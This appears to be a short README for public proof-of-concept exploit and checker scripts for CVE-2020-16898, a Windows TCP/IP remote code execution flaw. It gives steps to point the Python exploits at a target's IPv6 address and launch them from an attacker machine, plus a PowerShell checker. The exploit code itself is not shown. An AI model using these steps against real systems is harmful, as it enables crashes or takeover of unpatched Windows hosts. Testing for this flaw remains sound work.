
Exploit de prova de conceito e verificador para CVE-2020-16898, uma vulnerabilidade de execução remota de código no TCP/IP do Windows. Inclui scripts de exploit baseados em Python direcionados a endereços IPv6 de link local.
CVE-2020-16898 Windows TCP/IP Vulnerabilidade de Execução Remota de Código EXP&POC
forforever:https://www.cnblogs.com/forforever/p/13846077.html
CVE-2020-16898_Checker-poc
Comando:
Inicie o PowerShell/CMD como administrador
Powershell.exe -ExecutionPolicy UnRestricted -File .\CVE-2020-16898-poc.ps1
cve-2020-16898-exp2
Condições: conseguir se comunicar com o alvo, conhecer o endereço IPv6 link-local do alvo
Uso
Altere o parâmetro dst no código para o endereço IPv6 link-local do alvo
Em seguida, execute na máquina atacante
python3 CVE-2020-16898.py


CVE-2020-16898-exp1.py
Requer o "endereço IPv6" ou "endereço IPv6 temporário" do alvo e o próprio endereço IPv6 link-local
v6_dst = "fd15:4ba5:5a2b:1008:109f:9a46:8d19:f103" #修改为目标机的ipv6地址 或者 临时ipv6地址
v6_src = "fe80::501a:49b7:b7d:5362%12" #攻击者的本地ipv6地址
Durante os testes, descobriu-se que preencher o endereço IPv6 link-local do alvo também funcionava, não se sabe se é por causa do teste local ou se o endereço IPv6 de origem pode ser falsificado.
Após a modificação, execute diretamente
python3 CVE-2020-16898-exp1.py